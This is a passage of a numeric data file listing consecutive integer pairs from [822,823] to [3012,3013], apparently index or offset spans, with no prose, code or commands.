2],[822,823],[823,824],[824,825],[825,826],[826,827],[827,828],[828,829],[829,830],[830,831],[831,832],[832,833],[833,834],[834,835],[835,836],[836,837],[837,838],[838,839],[839,840],[840,841],[841,842],[842,843],[843,844],[844,845],[845,846],[846,847],[847,848],[848,849],[849,850],[850,851],[851,852],[852,853],[853,854],[854,855],[855,856],[856,857],[857,858],[858,859],[859,860],[860,861],[861,862],[862,863],[863,864],[864,865],[865,866],[866,867],[867,868],[868,869],[869,870],[870,871],[871,872],[872,873],[873,874],[874,875],[875,876],[876,877],[877,878],[878,879],[879,880],[880,881],[881,882],[882,883],[883,884],[884,885],[885,886],[886,887],[887,888],[888,889],[889,890],[890,891],[891,892],[892,893],[893,894],[894,895],[895,896],[896,897],[897,898],[898,899],[899,900],[900,901],[901,902],[902,903],[903,904],[904,905],[905,906],[906,907],[907,908],[908,909],[909,910],[910,911],[911,912],[912,913],[913,914],[914,915],[915,916],[916,917],[917,918],[918,919],[919,920],[920,921],[921,922],[922,923],[923,924],[924,925],[925,926],[926,927],[927,928],[928,929],[929,930],[930,931],[931,932],[932,933],[933,934],[934,935],[935,936],[936,937],[937,938],[938,939],[939,940],[940,941],[941,942],[942,943],[943,944],[944,945],[945,946],[946,947],[947,948],[948,949],[949,950],[950,951],[951,952],[952,953],[953,954],[954,955],[955,956],[956,957],[957,958],[958,959],[959,960],[960,961],[961,962],[962,963],[963,964],[964,965],[965,966],[966,967],[967,968],[968,969],[969,970],[970,971],[971,972],[972,973],[973,974],[974,975],[975,976],[976,977],[977,978],[978,979],[979,980],[980,981],[981,982],[982,983],[983,984],[984,985],[985,986],[986,987],[987,988],[988,989],[989,990],[990,991],[991,992],[992,993],[993,994],[994,995],[995,996],[996,997],[997,998],[998,999],[999,1000],[1000,1001],[1001,1002],[1002,1003],[1003,1004],[1004,1005],[1005,1006],[1006,1007],[1007,1008],[1008,1009],[1009,1010],[1010,1011],[1011,1012],[1012,1013],[1013,1014],[1014,1015],[1015,1016],[1016,1017],[1017,1018],
[1018,1019],[1019,1020],[1020,1021],[1021,1022],[1022,1023],[1023,1024],[1024,1025],[1025,1026],[1026,1027],[1027,1028],[1028,1029],[1029,1030],[1030,1031],[1031,1032],[1032,1033],[1033,1034],[1034,1035],[1035,1036],[1036,1037],[1037,1038],[1038,1039],[1039,1040],[1040,1041],[1041,1042],[1042,1043],[1043,1044],[1044,1045],[1045,1046],[1046,1047],[1047,1048],[1048,1049],[1049,1050],[1050,1051],[1051,1052],[1052,1053],[1053,1054],[1054,1055],[1055,1056],[1056,1057],[1057,1058],[1058,1059],[1059,1060],[1060,1061],[1061,1062],[1062,1063],[1063,1064],[1064,1065],[1065,1066],[1066,1067],[1067,1068],[1068,1069],[1069,1070],[1070,1071],[1071,1072],[1072,1073],[1073,1074],[1074,1075],[1075,1076],[1076,1077],[1077,1078],[1078,1079],[1079,1080],[1080,1081],[1081,1082],[1082,1083],[1083,1084],[1084,1085],[1085,1086],[1086,1087],[1087,1088],[1088,1089],[1089,1090],[1090,1091],[1091,1092],[1092,1093],[1093,1094],[1094,1095],[1095,1096],[1096,1097],[1097,1098],[1098,1099],[1099,1100],[1100,1101],[1101,1102],[1102,1103],[1103,1104],[1104,1105],[1105,1106],[1106,1107],[1107,1108],[1108,1109],[1109,1110],[1110,1111],[1111,1112],[1112,1113],[1113,1114],[1114,1115],[1115,1116],[1116,1117],[1117,1118],[1118,1119],[1119,1120],[1120,1121],[1121,1122],[1122,1123],[1123,1124],[1124,1125],[1125,1126],[1126,1127],[1127,1128],[1128,1129],[1129,1130],[1130,1131],[1131,1132],[1132,1133],[1133,1134],[1134,1135],[1135,1136],[1136,1137],[1137,1138],[1138,1139],[1139,1140],[1140,1141],[1141,1142],[1142,1143],[1143,1144],[1144,1145],[1145,1146],[1146,1147],[1147,1148],[1148,1149],[1149,1150],[1150,1151],[1151,1152],[1152,1153],[1153,1154],[1154,1155],[1155,1156],[1156,1157],[1157,1158],[1158,1159],[1159,1160],[1160,1161],[1161,1162],[1162,1163],[1163,1164],[1164,1165],[1165,1166],[1166,1167],[1167,1168],[1168,1169],[1169,1170],[1170,1171],[1171,1172],[1172,1173],[1173,1174],[1174,1175],[1175,1176],[1176,1177],[1177,1178],[1178,1179],[1179,1180],[1180,1181],[1181,1182],[1182,1183],[1183,1184],[1184,11
85],[1185,1186],[1186,1187],[1187,1188],[1188,1189],[1189,1190],[1190,1191],[1191,1192],[1192,1193],[1193,1194],[1194,1195],[1195,1196],[1196,1197],[1197,1198],[1198,1199],[1199,1200],[1200,1201],[1201,1202],[1202,1203],[1203,1204],[1204,1205],[1205,1206],[1206,1207],[1207,1208],[1208,1209],[1209,1210],[1210,1211],[1211,1212],[1212,1213],[1213,1214],[1214,1215],[1215,1216],[1216,1217],[1217,1218],[1218,1219],[1219,1220],[1220,1221],[1221,1222],[1222,1223],[1223,1224],[1224,1225],[1225,1226],[1226,1227],[1227,1228],[1228,1229],[1229,1230],[1230,1231],[1231,1232],[1232,1233],[1233,1234],[1234,1235],[1235,1236],[1236,1237],[1237,1238],[1238,1239],[1239,1240],[1240,1241],[1241,1242],[1242,1243],[1243,1244],[1244,1245],[1245,1246],[1246,1247],[1247,1248],[1248,1249],[1249,1250],[1250,1251],[1251,1252],[1252,1253],[1253,1254],[1254,1255],[1255,1256],[1256,1257],[1257,1258],[1258,1259],[1259,1260],[1260,1261],[1261,1262],[1262,1263],[1263,1264],[1264,1265],[1265,1266],[1266,1267],[1267,1268],[1268,1269],[1269,1270],[1270,1271],[1271,1272],[1272,1273],[1273,1274],[1274,1275],[1275,1276],[1276,1277],[1277,1278],[1278,1279],[1279,1280],[1280,1281],[1281,1282],[1282,1283],[1283,1284],[1284,1285],[1285,1286],[1286,1287],[1287,1288],[1288,1289],[1289,1290],[1290,1291],[1291,1292],[1292,1293],[1293,1294],[1294,1295],[1295,1296],[1296,1297],[1297,1298],[1298,1299],[1299,1300],[1300,1301],[1301,1302],[1302,1303],[1303,1304],[1304,1305],[1305,1306],[1306,1307],[1307,1308],[1308,1309],[1309,1310],[1310,1311],[1311,1312],[1312,1313],[1313,1314],[1314,1315],[1315,1316],[1316,1317],[1317,1318],[1318,1319],[1319,1320],[1320,1321],[1321,1322],[1322,1323],[1323,1324],[1324,1325],[1325,1326],[1326,1327],[1327,1328],[1328,1329],[1329,1330],[1330,1331],[1331,1332],[1332,1333],[1333,1334],[1334,1335],[1335,1336],[1336,1337],[1337,1338],[1338,1339],[1339,1340],[1340,1341],[1341,1342],[1342,1343],[1343,1344],[1344,1345],[1345,1346],[1346,1347],[1347,1348],[1348,1349],[1349,1350],[1350,1351],[135
1,1352],[1352,1353],[1353,1354],[1354,1355],[1355,1356],[1356,1357],[1357,1358],[1358,1359],[1359,1360],[1360,1361],[1361,1362],[1362,1363],[1363,1364],[1364,1365],[1365,1366],[1366,1367],[1367,1368],[1368,1369],[1369,1370],[1370,1371],[1371,1372],[1372,1373],[1373,1374],[1374,1375],[1375,1376],[1376,1377],[1377,1378],[1378,1379],[1379,1380],[1380,1381],[1381,1382],[1382,1383],[1383,1384],[1384,1385],[1385,1386],[1386,1387],[1387,1388],[1388,1389],[1389,1390],[1390,1391],[1391,1392],[1392,1393],[1393,1394],[1394,1395],[1395,1396],[1396,1397],[1397,1398],[1398,1399],[1399,1400],[1400,1401],[1401,1402],[1402,1403],[1403,1404],[1404,1405],[1405,1406],[1406,1407],[1407,1408],[1408,1409],[1409,1410],[1410,1411],[1411,1412],[1412,1413],[1413,1414],[1414,1415],[1415,1416],[1416,1417],[1417,1418],[1418,1419],[1419,1420],[1420,1421],[1421,1422],[1422,1423],[1423,1424],[1424,1425],[1425,1426],[1426,1427],[1427,1428],[1428,1429],[1429,1430],[1430,1431],[1431,1432],[1432,1433],[1433,1434],[1434,1435],[1435,1436],[1436,1437],[1437,1438],[1438,1439],[1439,1440],[1440,1441],[1441,1442],[1442,1443],[1443,1444],[1444,1445],[1445,1446],[1446,1447],[1447,1448],[1448,1449],[1449,1450],[1450,1451],[1451,1452],[1452,1453],[1453,1454],[1454,1455],[1455,1456],[1456,1457],[1457,1458],[1458,1459],[1459,1460],[1460,1461],[1461,1462],[1462,1463],[1463,1464],[1464,1465],[1465,1466],[1466,1467],[1467,1468],[1468,1469],[1469,1470],[1470,1471],[1471,1472],[1472,1473],[1473,1474],[1474,1475],[1475,1476],[1476,1477],[1477,1478],[1478,1479],[1479,1480],[1480,1481],[1481,1482],[1482,1483],[1483,1484],[1484,1485],[1485,1486],[1486,1487],[1487,1488],[1488,1489],[1489,1490],[1490,1491],[1491,1492],[1492,1493],[1493,1494],[1494,1495],[1495,1496],[1496,1497],[1497,1498],[1498,1499],[1499,1500],[1500,1501],[1501,1502],[1502,1503],[1503,1504],[1504,1505],[1505,1506],[1506,1507],[1507,1508],[1508,1509],[1509,1510],[1510,1511],[1511,1512],[1512,1513],[1513,1514],[1514,1515],[1515,1516],[1516,1517],[1517,1518],
[1518,1519],[1519,1520],[1520,1521],[1521,1522],[1522,1523],[1523,1524],[1524,1525],[1525,1526],[1526,1527],[1527,1528],[1528,1529],[1529,1530],[1530,1531],[1531,1532],[1532,1533],[1533,1534],[1534,1535],[1535,1536],[1536,1537],[1537,1538],[1538,1539],[1539,1540],[1540,1541],[1541,1542],[1542,1543],[1543,1544],[1544,1545],[1545,1546],[1546,1547],[1547,1548],[1548,1549],[1549,1550],[1550,1551],[1551,1552],[1552,1553],[1553,1554],[1554,1555],[1555,1556],[1556,1557],[1557,1558],[1558,1559],[1559,1560],[1560,1561],[1561,1562],[1562,1563],[1563,1564],[1564,1565],[1565,1566],[1566,1567],[1567,1568],[1568,1569],[1569,1570],[1570,1571],[1571,1572],[1572,1573],[1573,1574],[1574,1575],[1575,1576],[1576,1577],[1577,1578],[1578,1579],[1579,1580],[1580,1581],[1581,1582],[1582,1583],[1583,1584],[1584,1585],[1585,1586],[1586,1587],[1587,1588],[1588,1589],[1589,1590],[1590,1591],[1591,1592],[1592,1593],[1593,1594],[1594,1595],[1595,1596],[1596,1597],[1597,1598],[1598,1599],[1599,1600],[1600,1601],[1601,1602],[1602,1603],[1603,1604],[1604,1605],[1605,1606],[1606,1607],[1607,1608],[1608,1609],[1609,1610],[1610,1611],[1611,1612],[1612,1613],[1613,1614],[1614,1615],[1615,1616],[1616,1617],[1617,1618],[1618,1619],[1619,1620],[1620,1621],[1621,1622],[1622,1623],[1623,1624],[1624,1625],[1625,1626],[1626,1627],[1627,1628],[1628,1629],[1629,1630],[1630,1631],[1631,1632],[1632,1633],[1633,1634],[1634,1635],[1635,1636],[1636,1637],[1637,1638],[1638,1639],[1639,1640],[1640,1641],[1641,1642],[1642,1643],[1643,1644],[1644,1645],[1645,1646],[1646,1647],[1647,1648],[1648,1649],[1649,1650],[1650,1651],[1651,1652],[1652,1653],[1653,1654],[1654,1655],[1655,1656],[1656,1657],[1657,1658],[1658,1659],[1659,1660],[1660,1661],[1661,1662],[1662,1663],[1663,1664],[1664,1665],[1665,1666],[1666,1667],[1667,1668],[1668,1669],[1669,1670],[1670,1671],[1671,1672],[1672,1673],[1673,1674],[1674,1675],[1675,1676],[1676,1677],[1677,1678],[1678,1679],[1679,1680],[1680,1681],[1681,1682],[1682,1683],[1683,1684],[1684,16
85],[1685,1686],[1686,1687],[1687,1688],[1688,1689],[1689,1690],[1690,1691],[1691,1692],[1692,1693],[1693,1694],[1694,1695],[1695,1696],[1696,1697],[1697,1698],[1698,1699],[1699,1700],[1700,1701],[1701,1702],[1702,1703],[1703,1704],[1704,1705],[1705,1706],[1706,1707],[1707,1708],[1708,1709],[1709,1710],[1710,1711],[1711,1712],[1712,1713],[1713,1714],[1714,1715],[1715,1716],[1716,1717],[1717,1718],[1718,1719],[1719,1720],[1720,1721],[1721,1722],[1722,1723],[1723,1724],[1724,1725],[1725,1726],[1726,1727],[1727,1728],[1728,1729],[1729,1730],[1730,1731],[1731,1732],[1732,1733],[1733,1734],[1734,1735],[1735,1736],[1736,1737],[1737,1738],[1738,1739],[1739,1740],[1740,1741],[1741,1742],[1742,1743],[1743,1744],[1744,1745],[1745,1746],[1746,1747],[1747,1748],[1748,1749],[1749,1750],[1750,1751],[1751,1752],[1752,1753],[1753,1754],[1754,1755],[1755,1756],[1756,1757],[1757,1758],[1758,1759],[1759,1760],[1760,1761],[1761,1762],[1762,1763],[1763,1764],[1764,1765],[1765,1766],[1766,1767],[1767,1768],[1768,1769],[1769,1770],[1770,1771],[1771,1772],[1772,1773],[1773,1774],[1774,1775],[1775,1776],[1776,1777],[1777,1778],[1778,1779],[1779,1780],[1780,1781],[1781,1782],[1782,1783],[1783,1784],[1784,1785],[1785,1786],[1786,1787],[1787,1788],[1788,1789],[1789,1790],[1790,1791],[1791,1792],[1792,1793],[1793,1794],[1794,1795],[1795,1796],[1796,1797],[1797,1798],[1798,1799],[1799,1800],[1800,1801],[1801,1802],[1802,1803],[1803,1804],[1804,1805],[1805,1806],[1806,1807],[1807,1808],[1808,1809],[1809,1810],[1810,1811],[1811,1812],[1812,1813],[1813,1814],[1814,1815],[1815,1816],[1816,1817],[1817,1818],[1818,1819],[1819,1820],[1820,1821],[1821,1822],[1822,1823],[1823,1824],[1824,1825],[1825,1826],[1826,1827],[1827,1828],[1828,1829],[1829,1830],[1830,1831],[1831,1832],[1832,1833],[1833,1834],[1834,1835],[1835,1836],[1836,1837],[1837,1838],[1838,1839],[1839,1840],[1840,1841],[1841,1842],[1842,1843],[1843,1844],[1844,1845],[1845,1846],[1846,1847],[1847,1848],[1848,1849],[1849,1850],[1850,1851],[185
1,1852],[1852,1853],[1853,1854],[1854,1855],[1855,1856],[1856,1857],[1857,1858],[1858,1859],[1859,1860],[1860,1861],[1861,1862],[1862,1863],[1863,1864],[1864,1865],[1865,1866],[1866,1867],[1867,1868],[1868,1869],[1869,1870],[1870,1871],[1871,1872],[1872,1873],[1873,1874],[1874,1875],[1875,1876],[1876,1877],[1877,1878],[1878,1879],[1879,1880],[1880,1881],[1881,1882],[1882,1883],[1883,1884],[1884,1885],[1885,1886],[1886,1887],[1887,1888],[1888,1889],[1889,1890],[1890,1891],[1891,1892],[1892,1893],[1893,1894],[1894,1895],[1895,1896],[1896,1897],[1897,1898],[1898,1899],[1899,1900],[1900,1901],[1901,1902],[1902,1903],[1903,1904],[1904,1905],[1905,1906],[1906,1907],[1907,1908],[1908,1909],[1909,1910],[1910,1911],[1911,1912],[1912,1913],[1913,1914],[1914,1915],[1915,1916],[1916,1917],[1917,1918],[1918,1919],[1919,1920],[1920,1921],[1921,1922],[1922,1923],[1923,1924],[1924,1925],[1925,1926],[1926,1927],[1927,1928],[1928,1929],[1929,1930],[1930,1931],[1931,1932],[1932,1933],[1933,1934],[1934,1935],[1935,1936],[1936,1937],[1937,1938],[1938,1939],[1939,1940],[1940,1941],[1941,1942],[1942,1943],[1943,1944],[1944,1945],[1945,1946],[1946,1947],[1947,1948],[1948,1949],[1949,1950],[1950,1951],[1951,1952],[1952,1953],[1953,1954],[1954,1955],[1955,1956],[1956,1957],[1957,1958],[1958,1959],[1959,1960],[1960,1961],[1961,1962],[1962,1963],[1963,1964],[1964,1965],[1965,1966],[1966,1967],[1967,1968],[1968,1969],[1969,1970],[1970,1971],[1971,1972],[1972,1973],[1973,1974],[1974,1975],[1975,1976],[1976,1977],[1977,1978],[1978,1979],[1979,1980],[1980,1981],[1981,1982],[1982,1983],[1983,1984],[1984,1985],[1985,1986],[1986,1987],[1987,1988],[1988,1989],[1989,1990],[1990,1991],[1991,1992],[1992,1993],[1993,1994],[1994,1995],[1995,1996],[1996,1997],[1997,1998],[1998,1999],[1999,2000],[2000,2001],[2001,2002],[2002,2003],[2003,2004],[2004,2005],[2005,2006],[2006,2007],[2007,2008],[2008,2009],[2009,2010],[2010,2011],[2011,2012],[2012,2013],[2013,2014],[2014,2015],[2015,2016],[2016,2017],[2017,2018],
[2018,2019],[2019,2020],[2020,2021],[2021,2022],[2022,2023],[2023,2024],[2024,2025],[2025,2026],[2026,2027],[2027,2028],[2028,2029],[2029,2030],[2030,2031],[2031,2032],[2032,2033],[2033,2034],[2034,2035],[2035,2036],[2036,2037],[2037,2038],[2038,2039],[2039,2040],[2040,2041],[2041,2042],[2042,2043],[2043,2044],[2044,2045],[2045,2046],[2046,2047],[2047,2048],[2048,2049],[2049,2050],[2050,2051],[2051,2052],[2052,2053],[2053,2054],[2054,2055],[2055,2056],[2056,2057],[2057,2058],[2058,2059],[2059,2060],[2060,2061],[2061,2062],[2062,2063],[2063,2064],[2064,2065],[2065,2066],[2066,2067],[2067,2068],[2068,2069],[2069,2070],[2070,2071],[2071,2072],[2072,2073],[2073,2074],[2074,2075],[2075,2076],[2076,2077],[2077,2078],[2078,2079],[2079,2080],[2080,2081],[2081,2082],[2082,2083],[2083,2084],[2084,2085],[2085,2086],[2086,2087],[2087,2088],[2088,2089],[2089,2090],[2090,2091],[2091,2092],[2092,2093],[2093,2094],[2094,2095],[2095,2096],[2096,2097],[2097,2098],[2098,2099],[2099,2100],[2100,2101],[2101,2102],[2102,2103],[2103,2104],[2104,2105],[2105,2106],[2106,2107],[2107,2108],[2108,2109],[2109,2110],[2110,2111],[2111,2112],[2112,2113],[2113,2114],[2114,2115],[2115,2116],[2116,2117],[2117,2118],[2118,2119],[2119,2120],[2120,2121],[2121,2122],[2122,2123],[2123,2124],[2124,2125],[2125,2126],[2126,2127],[2127,2128],[2128,2129],[2129,2130],[2130,2131],[2131,2132],[2132,2133],[2133,2134],[2134,2135],[2135,2136],[2136,2137],[2137,2138],[2138,2139],[2139,2140],[2140,2141],[2141,2142],[2142,2143],[2143,2144],[2144,2145],[2145,2146],[2146,2147],[2147,2148],[2148,2149],[2149,2150],[2150,2151],[2151,2152],[2152,2153],[2153,2154],[2154,2155],[2155,2156],[2156,2157],[2157,2158],[2158,2159],[2159,2160],[2160,2161],[2161,2162],[2162,2163],[2163,2164],[2164,2165],[2165,2166],[2166,2167],[2167,2168],[2168,2169],[2169,2170],[2170,2171],[2171,2172],[2172,2173],[2173,2174],[2174,2175],[2175,2176],[2176,2177],[2177,2178],[2178,2179],[2179,2180],[2180,2181],[2181,2182],[2182,2183],[2183,2184],[2184,21
85],[2185,2186],[2186,2187],[2187,2188],[2188,2189],[2189,2190],[2190,2191],[2191,2192],[2192,2193],[2193,2194],[2194,2195],[2195,2196],[2196,2197],[2197,2198],[2198,2199],[2199,2200],[2200,2201],[2201,2202],[2202,2203],[2203,2204],[2204,2205],[2205,2206],[2206,2207],[2207,2208],[2208,2209],[2209,2210],[2210,2211],[2211,2212],[2212,2213],[2213,2214],[2214,2215],[2215,2216],[2216,2217],[2217,2218],[2218,2219],[2219,2220],[2220,2221],[2221,2222],[2222,2223],[2223,2224],[2224,2225],[2225,2226],[2226,2227],[2227,2228],[2228,2229],[2229,2230],[2230,2231],[2231,2232],[2232,2233],[2233,2234],[2234,2235],[2235,2236],[2236,2237],[2237,2238],[2238,2239],[2239,2240],[2240,2241],[2241,2242],[2242,2243],[2243,2244],[2244,2245],[2245,2246],[2246,2247],[2247,2248],[2248,2249],[2249,2250],[2250,2251],[2251,2252],[2252,2253],[2253,2254],[2254,2255],[2255,2256],[2256,2257],[2257,2258],[2258,2259],[2259,2260],[2260,2261],[2261,2262],[2262,2263],[2263,2264],[2264,2265],[2265,2266],[2266,2267],[2267,2268],[2268,2269],[2269,2270],[2270,2271],[2271,2272],[2272,2273],[2273,2274],[2274,2275],[2275,2276],[2276,2277],[2277,2278],[2278,2279],[2279,2280],[2280,2281],[2281,2282],[2282,2283],[2283,2284],[2284,2285],[2285,2286],[2286,2287],[2287,2288],[2288,2289],[2289,2290],[2290,2291],[2291,2292],[2292,2293],[2293,2294],[2294,2295],[2295,2296],[2296,2297],[2297,2298],[2298,2299],[2299,2300],[2300,2301],[2301,2302],[2302,2303],[2303,2304],[2304,2305],[2305,2306],[2306,2307],[2307,2308],[2308,2309],[2309,2310],[2310,2311],[2311,2312],[2312,2313],[2313,2314],[2314,2315],[2315,2316],[2316,2317],[2317,2318],[2318,2319],[2319,2320],[2320,2321],[2321,2322],[2322,2323],[2323,2324],[2324,2325],[2325,2326],[2326,2327],[2327,2328],[2328,2329],[2329,2330],[2330,2331],[2331,2332],[2332,2333],[2333,2334],[2334,2335],[2335,2336],[2336,2337],[2337,2338],[2338,2339],[2339,2340],[2340,2341],[2341,2342],[2342,2343],[2343,2344],[2344,2345],[2345,2346],[2346,2347],[2347,2348],[2348,2349],[2349,2350],[2350,2351],[235
1,2352],[2352,2353],[2353,2354],[2354,2355],[2355,2356],[2356,2357],[2357,2358],[2358,2359],[2359,2360],[2360,2361],[2361,2362],[2362,2363],[2363,2364],[2364,2365],[2365,2366],[2366,2367],[2367,2368],[2368,2369],[2369,2370],[2370,2371],[2371,2372],[2372,2373],[2373,2374],[2374,2375],[2375,2376],[2376,2377],[2377,2378],[2378,2379],[2379,2380],[2380,2381],[2381,2382],[2382,2383],[2383,2384],[2384,2385],[2385,2386],[2386,2387],[2387,2388],[2388,2389],[2389,2390],[2390,2391],[2391,2392],[2392,2393],[2393,2394],[2394,2395],[2395,2396],[2396,2397],[2397,2398],[2398,2399],[2399,2400],[2400,2401],[2401,2402],[2402,2403],[2403,2404],[2404,2405],[2405,2406],[2406,2407],[2407,2408],[2408,2409],[2409,2410],[2410,2411],[2411,2412],[2412,2413],[2413,2414],[2414,2415],[2415,2416],[2416,2417],[2417,2418],[2418,2419],[2419,2420],[2420,2421],[2421,2422],[2422,2423],[2423,2424],[2424,2425],[2425,2426],[2426,2427],[2427,2428],[2428,2429],[2429,2430],[2430,2431],[2431,2432],[2432,2433],[2433,2434],[2434,2435],[2435,2436],[2436,2437],[2437,2438],[2438,2439],[2439,2440],[2440,2441],[2441,2442],[2442,2443],[2443,2444],[2444,2445],[2445,2446],[2446,2447],[2447,2448],[2448,2449],[2449,2450],[2450,2451],[2451,2452],[2452,2453],[2453,2454],[2454,2455],[2455,2456],[2456,2457],[2457,2458],[2458,2459],[2459,2460],[2460,2461],[2461,2462],[2462,2463],[2463,2464],[2464,2465],[2465,2466],[2466,2467],[2467,2468],[2468,2469],[2469,2470],[2470,2471],[2471,2472],[2472,2473],[2473,2474],[2474,2475],[2475,2476],[2476,2477],[2477,2478],[2478,2479],[2479,2480],[2480,2481],[2481,2482],[2482,2483],[2483,2484],[2484,2485],[2485,2486],[2486,2487],[2487,2488],[2488,2489],[2489,2490],[2490,2491],[2491,2492],[2492,2493],[2493,2494],[2494,2495],[2495,2496],[2496,2497],[2497,2498],[2498,2499],[2499,2500],[2500,2501],[2501,2502],[2502,2503],[2503,2504],[2504,2505],[2505,2506],[2506,2507],[2507,2508],[2508,2509],[2509,2510],[2510,2511],[2511,2512],[2512,2513],[2513,2514],[2514,2515],[2515,2516],[2516,2517],[2517,2518],
[2518,2519],[2519,2520],[2520,2521],[2521,2522],[2522,2523],[2523,2524],[2524,2525],[2525,2526],[2526,2527],[2527,2528],[2528,2529],[2529,2530],[2530,2531],[2531,2532],[2532,2533],[2533,2534],[2534,2535],[2535,2536],[2536,2537],[2537,2538],[2538,2539],[2539,2540],[2540,2541],[2541,2542],[2542,2543],[2543,2544],[2544,2545],[2545,2546],[2546,2547],[2547,2548],[2548,2549],[2549,2550],[2550,2551],[2551,2552],[2552,2553],[2553,2554],[2554,2555],[2555,2556],[2556,2557],[2557,2558],[2558,2559],[2559,2560],[2560,2561],[2561,2562],[2562,2563],[2563,2564],[2564,2565],[2565,2566],[2566,2567],[2567,2568],[2568,2569],[2569,2570],[2570,2571],[2571,2572],[2572,2573],[2573,2574],[2574,2575],[2575,2576],[2576,2577],[2577,2578],[2578,2579],[2579,2580],[2580,2581],[2581,2582],[2582,2583],[2583,2584],[2584,2585],[2585,2586],[2586,2587],[2587,2588],[2588,2589],[2589,2590],[2590,2591],[2591,2592],[2592,2593],[2593,2594],[2594,2595],[2595,2596],[2596,2597],[2597,2598],[2598,2599],[2599,2600],[2600,2601],[2601,2602],[2602,2603],[2603,2604],[2604,2605],[2605,2606],[2606,2607],[2607,2608],[2608,2609],[2609,2610],[2610,2611],[2611,2612],[2612,2613],[2613,2614],[2614,2615],[2615,2616],[2616,2617],[2617,2618],[2618,2619],[2619,2620],[2620,2621],[2621,2622],[2622,2623],[2623,2624],[2624,2625],[2625,2626],[2626,2627],[2627,2628],[2628,2629],[2629,2630],[2630,2631],[2631,2632],[2632,2633],[2633,2634],[2634,2635],[2635,2636],[2636,2637],[2637,2638],[2638,2639],[2639,2640],[2640,2641],[2641,2642],[2642,2643],[2643,2644],[2644,2645],[2645,2646],[2646,2647],[2647,2648],[2648,2649],[2649,2650],[2650,2651],[2651,2652],[2652,2653],[2653,2654],[2654,2655],[2655,2656],[2656,2657],[2657,2658],[2658,2659],[2659,2660],[2660,2661],[2661,2662],[2662,2663],[2663,2664],[2664,2665],[2665,2666],[2666,2667],[2667,2668],[2668,2669],[2669,2670],[2670,2671],[2671,2672],[2672,2673],[2673,2674],[2674,2675],[2675,2676],[2676,2677],[2677,2678],[2678,2679],[2679,2680],[2680,2681],[2681,2682],[2682,2683],[2683,2684],[2684,26
85],[2685,2686],[2686,2687],[2687,2688],[2688,2689],[2689,2690],[2690,2691],[2691,2692],[2692,2693],[2693,2694],[2694,2695],[2695,2696],[2696,2697],[2697,2698],[2698,2699],[2699,2700],[2700,2701],[2701,2702],[2702,2703],[2703,2704],[2704,2705],[2705,2706],[2706,2707],[2707,2708],[2708,2709],[2709,2710],[2710,2711],[2711,2712],[2712,2713],[2713,2714],[2714,2715],[2715,2716],[2716,2717],[2717,2718],[2718,2719],[2719,2720],[2720,2721],[2721,2722],[2722,2723],[2723,2724],[2724,2725],[2725,2726],[2726,2727],[2727,2728],[2728,2729],[2729,2730],[2730,2731],[2731,2732],[2732,2733],[2733,2734],[2734,2735],[2735,2736],[2736,2737],[2737,2738],[2738,2739],[2739,2740],[2740,2741],[2741,2742],[2742,2743],[2743,2744],[2744,2745],[2745,2746],[2746,2747],[2747,2748],[2748,2749],[2749,2750],[2750,2751],[2751,2752],[2752,2753],[2753,2754],[2754,2755],[2755,2756],[2756,2757],[2757,2758],[2758,2759],[2759,2760],[2760,2761],[2761,2762],[2762,2763],[2763,2764],[2764,2765],[2765,2766],[2766,2767],[2767,2768],[2768,2769],[2769,2770],[2770,2771],[2771,2772],[2772,2773],[2773,2774],[2774,2775],[2775,2776],[2776,2777],[2777,2778],[2778,2779],[2779,2780],[2780,2781],[2781,2782],[2782,2783],[2783,2784],[2784,2785],[2785,2786],[2786,2787],[2787,2788],[2788,2789],[2789,2790],[2790,2791],[2791,2792],[2792,2793],[2793,2794],[2794,2795],[2795,2796],[2796,2797],[2797,2798],[2798,2799],[2799,2800],[2800,2801],[2801,2802],[2802,2803],[2803,2804],[2804,2805],[2805,2806],[2806,2807],[2807,2808],[2808,2809],[2809,2810],[2810,2811],[2811,2812],[2812,2813],[2813,2814],[2814,2815],[2815,2816],[2816,2817],[2817,2818],[2818,2819],[2819,2820],[2820,2821],[2821,2822],[2822,2823],[2823,2824],[2824,2825],[2825,2826],[2826,2827],[2827,2828],[2828,2829],[2829,2830],[2830,2831],[2831,2832],[2832,2833],[2833,2834],[2834,2835],[2835,2836],[2836,2837],[2837,2838],[2838,2839],[2839,2840],[2840,2841],[2841,2842],[2842,2843],[2843,2844],[2844,2845],[2845,2846],[2846,2847],[2847,2848],[2848,2849],[2849,2850],[2850,2851],[285
1,2852],[2852,2853],[2853,2854],[2854,2855],[2855,2856],[2856,2857],[2857,2858],[2858,2859],[2859,2860],[2860,2861],[2861,2862],[2862,2863],[2863,2864],[2864,2865],[2865,2866],[2866,2867],[2867,2868],[2868,2869],[2869,2870],[2870,2871],[2871,2872],[2872,2873],[2873,2874],[2874,2875],[2875,2876],[2876,2877],[2877,2878],[2878,2879],[2879,2880],[2880,2881],[2881,2882],[2882,2883],[2883,2884],[2884,2885],[2885,2886],[2886,2887],[2887,2888],[2888,2889],[2889,2890],[2890,2891],[2891,2892],[2892,2893],[2893,2894],[2894,2895],[2895,2896],[2896,2897],[2897,2898],[2898,2899],[2899,2900],[2900,2901],[2901,2902],[2902,2903],[2903,2904],[2904,2905],[2905,2906],[2906,2907],[2907,2908],[2908,2909],[2909,2910],[2910,2911],[2911,2912],[2912,2913],[2913,2914],[2914,2915],[2915,2916],[2916,2917],[2917,2918],[2918,2919],[2919,2920],[2920,2921],[2921,2922],[2922,2923],[2923,2924],[2924,2925],[2925,2926],[2926,2927],[2927,2928],[2928,2929],[2929,2930],[2930,2931],[2931,2932],[2932,2933],[2933,2934],[2934,2935],[2935,2936],[2936,2937],[2937,2938],[2938,2939],[2939,2940],[2940,2941],[2941,2942],[2942,2943],[2943,2944],[2944,2945],[2945,2946],[2946,2947],[2947,2948],[2948,2949],[2949,2950],[2950,2951],[2951,2952],[2952,2953],[2953,2954],[2954,2955],[2955,2956],[2956,2957],[2957,2958],[2958,2959],[2959,2960],[2960,2961],[2961,2962],[2962,2963],[2963,2964],[2964,2965],[2965,2966],[2966,2967],[2967,2968],[2968,2969],[2969,2970],[2970,2971],[2971,2972],[2972,2973],[2973,2974],[2974,2975],[2975,2976],[2976,2977],[2977,2978],[2978,2979],[2979,2980],[2980,2981],[2981,2982],[2982,2983],[2983,2984],[2984,2985],[2985,2986],[2986,2987],[2987,2988],[2988,2989],[2989,2990],[2990,2991],[2991,2992],[2992,2993],[2993,2994],[2994,2995],[2995,2996],[2996,2997],[2997,2998],[2998,2999],[2999,3000],[3000,3001],[3001,3002],[3002,3003],[3003,3004],[3004,3005],[3005,3006],[3006,3007],[3007,3008],[3008,3009],[3009,3010],[3010,3011],[3011,3012],[3012,3013],[3013,